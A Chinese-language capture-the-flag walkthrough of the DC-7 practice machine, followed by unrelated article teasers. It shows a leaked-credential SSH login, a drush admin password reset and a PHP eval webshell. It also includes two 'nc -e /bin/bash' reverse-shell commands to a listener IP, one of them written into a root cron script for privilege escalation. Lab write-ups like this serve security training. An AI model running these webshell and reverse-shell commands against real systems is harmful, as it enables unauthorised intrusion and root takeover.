DC-7 靶机

news2024/11/15 21:57:42

DC_7

信息搜集

存活检测

image-20231024085438718

详细扫描

image-20231024085540887

后台网页扫描

image-20231024124401722

网页信息搜集

image-20231024085507080

搜索相关信息

image-20231024085734738

image-20231024085911869

image-20231024085940503

在配置中发现了用户名密码字样

$username = "dc7user";
$password = "MdR3xOgB7#dW";

image-20231024090054193

ssh 登录

  • 尝试使用获取的账密进行登录

    网页登录失败

    image-20231024124513243

  • 尝试 ssh 登录

    成功登录

    image-20231024130241838

  • 登陆今后提示收到了一个邮件

    查看邮件内容

    cd /var/mail
    

    image-20231024130516576

  • 看到有 root 的计划任务

  • 查看执行计划任务的文件权限

    image-20231024125954322

    www-data 组拥有全部权限,而其他用户无修改权限

  • 查看 dc7user 属组,不属于 www-data,无法修改内容

    image-20231024130048738

  • 查看计划任务内容

    image-20231024125726351

    脚本内容显示

    进入 /var/www/html 目录可执行 drush 命令

    Drush 是一个用于管理 Drupal 网站的命令行工具。它提供了一组功能丰富的命令,可以在不使用网页界面的情况下执行各种 Drupal 管理任务。

    Drush 命令可以在终端或命令提示符中使用,并且可以在 Drupal 项目的根目录中执行

  • 可以使用 drush 命令更改用户的登陆密码

    cd /var/www/html/
    drush user-password admin --password="123456"
    

    image-20231024131937921

反弹 shell

  • 登录网页

    输入用户名和修改的密码,登录

    image-20231024132105472

  • 登录后发现可以编辑内容

    image-20231024132636513

  • 尝试上传一句话 php 木马

    <?php @eval($_POST['gjl']); ?>
    

    发现编辑时没有 php 解析

    image-20231024133038787

  • 拓展中可安装 php

    PHP 解释器 Drupal 官方连接

    https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz
    

    image-20231024133120870

    成功安装

    image-20231024133132911

  • 勾选 php,点击最下方的 install

    image-20231024133305703

  • 成功启动 php

    image-20231024133417813

  • 上传一句话木马

    image-20231024133216117

    选择 php code,点击 save

    image-20231024133601036

    image-20231024133736552

  • 打开蚁剑

    添加上传 php 所在的 url,测试链接

    image-20231024133830997

  • 打开连接,开启虚拟终端

    image-20231024133947875

  • kali 开启监听

    image-20231024133938625

  • 在蚁剑的虚拟终端输入反弹命令

    nc -e /bin/bash 10.4.7.146 7777
    

    image-20231024134119374

    成功反弹进 kali

提权

  • 此时获得了 www-data 的 shell

    image-20231024134308655

  • 根据前面搜集的信息可知,现在可以修改 root 的定时任务 /opt/scripts/backups.sh

  • kali 开启监听

    image-20231024134616970

  • 添加提权命令

    echo "nc -e /bin/bash 10.4.7.146 6666" > /opt/scripts/backups.sh
    

    image-20231024134741234

    因为 backup.sh 是以 root 权限运行,连接反弹 shell 后获取的权限为 root 权限

  • 等待计划任务自动执行(运气不好最长等 15 分钟,计划任务 15 分钟执行一次)

    image-20231024135030629

  • 提权成功

    image-20231024140232844

总结

  • drush 修改 Drupal 网站账户密码

  • 计划任务、反弹 shell 提权

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1131268.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

迷你洗衣机哪个牌子好又实惠?内裤洗衣机热销前四榜单

小型内裤洗衣机是一款很实用的家用电器&#xff0c;非常适合住在小户型的房子里&#xff0c;或者经常要出差的人。所以&#xff0c;买什么牌子的内衣洗衣机比较好&#xff1f;目前市场上各品牌各有各的特色及应用场合&#xff0c;例如适合于贴身衣物如内衣、内裤、婴儿衣物清洗…

线性表操作的实现--单链表(链式存储结构)

本文参考朱战力老师的数据结构与算法--使用C语言一书 目录 文章目录 前言 一、链表是什么&#xff1f; 二、具体实现 1.单链表的定义 2.初始化ListInitiate&#xff08;SLNode **head&#xff09; 3.求当前元素的个数ListLength&#xff08;SLNode *head&#xff09; 4.插入Lis…

学会Docker之——界面化操作(Docker Desktop)

Docker Desktop 是一款用于在桌面环境下开发、构建和容器化应用程序的工具。它适用于 Windows 和 Mac 操作系统&#xff0c;让开发人员可以轻松地在本地环境中创建和运行容器&#xff0c;并与 Docker Hub 和其他容器注册表进行交互。Docker Desktop集成了Docker Engine&#xf…

C语言文件操作(详解)

&#x1f493;博客主页&#xff1a;江池俊的博客⏩收录专栏&#xff1a;C语言进阶之路&#x1f449;专栏推荐&#xff1a;✅C语言初阶之路 ✅数据结构探索✅C语言刷题专栏&#x1f4bb;代码仓库&#xff1a;江池俊的代码仓库&#x1f389;欢迎大家点赞&#x1f44d;评论&#x…

Maven历史版本下载

网址: https://archive.apache.org/dist/maven/maven-3/3.8.6/binaries/

个人博客测试报告

目录 一、项目背景 二、项目功能 三、测试计划 功能测试 1、测试用例 ​编辑 2、 实际执行测试的部分操作步骤/截图 3、发现的bug 自动化测试 博客访问连接 一、项目背景 个人博客系统采用前后端分离的方法来实现&#xff0c;同时使用了数据库来存储相关的数据&#xf…

文心一言简单体验

百度正式发布文心一言&#xff0c;文心一言 这里的插件模式挺有意思&#xff1a; 测试了一下图解说明&#xff0c;随意上传了一张图片&#xff1a; 提供图解让反过来画&#xff0c;抓住了部分重点&#xff0c;但是还是和原图有比较大的差异&#xff01; 百宝箱 暂未逐个体验&am…

台灯应该买什么样的才能护眼?五款专业的护眼台灯推荐

台灯主要还是以护眼台灯为主&#xff0c;因为不仅色谱丰富&#xff0c;贴近自然色的全光谱色彩&#xff0c;通常显色指数都能达到Ra95以上&#xff0c;显色能力特别强&#xff0c;而且还具有其他防辐射危害、提高光线舒适度的特性&#xff0c;比如侧发光技术、漫反射技术等大大…

Windows更新强制关闭

使用管理员身份运行cmd或者使用powershell 执行下述命令 reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsUpdate\UX\Settings" /v FlightSettingsMaxPauseDays /t reg_dword /d 36525 /f可以看到更新选项中可以截止到2123年,我感觉比我生命的终点要靠后了! …

设树B是一棵采用链式结构存储的二叉树,编写一个把树 B中所有结点的左、右子树进行交换的函数 中国科学院大学2015年数据结构(c语言代码实现)

本题代码如下 void swap(tree* t) {if (*t)// 如果当前节点非空 {treenode* temp (*t)->lchild;// 临时存储左子节点 (*t)->lchild (*t)->rchild;// 将右子节点赋值给左子节点(*t)->rchild temp;// 将临时存储的左子节点赋值给右子节点 swap(&(*t)->l…

c语言进制的转换10进制转换2进制

c语言进制的转换之10进制转换2进制 c语言10进制转换2进制 c语言进制的转换之10进制转换2进制一、10进制转换2进制的方法 一、10进制转换2进制的方法 十进制转二进制&#xff1a; 除二反序取余法&#xff1a;将十进制数每次除以2 取出余数 按照结果倒叙依次获取结果 END

机器学习实验一:KNN算法,手写数字数据集(使用汉明距离)(2)

KNN-手写数字数据集&#xff1a; 使用sklearn中的KNN算法工具包&#xff08; KNeighborsClassifier)替换实现分类器的构建&#xff0c;注意使用的是汉明距离&#xff1b; 运行结果&#xff1a;&#xff08;大概要运行4分钟左右&#xff09; 代码&#xff1a; import pandas as…

JavaWeb——Servlet原理、生命周期、IDEA中实现一个Servlet(全过程)

6、servlet 6.1、什么是servlet 在JavaWeb中&#xff0c;Servlet是基于Java编写的服务器端组件&#xff0c;用于处理客户端&#xff08;通常是Web浏览器&#xff09;发送的HTTP请求并生成相应的HTTP响应。Servlet运行在Web服务器上&#xff0c;与Web容器&#xff08;如Tomcat&…

警惕!又2本期刊被“On Hold”!

【SciencePub学术】 此前&#xff0c;继一本SSCI期刊被取消“On hold”标识后&#xff0c;仍处于“On Hold”状态的期刊有6本&#xff0c;其中包括4本SCI期刊和2本ESCI期刊。近日&#xff0c;经小编查询&#xff0c;又新增2本“On Hold”期刊&#xff0c;详情如下&#xff1a;…

实例演示:拉格朗日乘子法(Lagrange multiplier method)

拉格朗日乘子法&#xff08;Lagrange multiplier method&#xff09;是一种寻找多元函数在一组约束下的极值的方法。通过引入拉格朗日乘子&#xff0c;可将有d个变量与k个约束条件的最优化问题转化为具有dk个变量的无约束优化问题求解。这种方法将一个有n个变量与k个约束条件的…

以数据赋能,星辰天合推进智慧化校园建设

近日&#xff0c;上海市高等教育学会校园网络专业委员会 2023 年度学术年会在上海举办&#xff0c;本次会议以“数智赋能教育 生成美好未来”为主题&#xff0c;围绕 AI 与教育融合、高校数字化转型创新发展等内容进行了专业研讨。 XSKY星辰天合解决方案总监李瑞宇作了《应用融…

ETHERNET/IP从站转CANOPEN主站连接AB系统的配置方法

你还在为配置网关的ETHERNET/IP从站和CANOPEN主站发愁吗&#xff1f;今天来教你解决办法&#xff01; 一&#xff0c;首先&#xff0c;配置网关的ETHERNET/IP从站&#xff0c;需要使用AB系统的配置方法&#xff0c;具体步骤如下 1&#xff0c;使用 AB 系统配置网关的 ETHERNET/…

Leetcode—547.省份数量【中等】

2023每日刷题&#xff08;八&#xff09; Leetcode—547.省份数量 实现代码 static int father[210] {0};int Find(int x) {if(x ! father[x]) {father[x] Find(father[x]);}return father[x]; }void Union(int x, int y) {int a Find(x);int b Find(y);if(a ! b) {fathe…

【java学习—八】单例设计模式(5)

文章目录 1. 相关概念2. 单例设计模式-饿汉式3. 单例设计模式-懒汉式4. 总结 1. 相关概念 单例&#xff1a;只有一个实例&#xff08;实例化对象&#xff09; 设计模式是在大量的实践中总结和理论化之后优选的代码结构、编程风格、以及解决问题的思考方式。设计模式就像是经典的…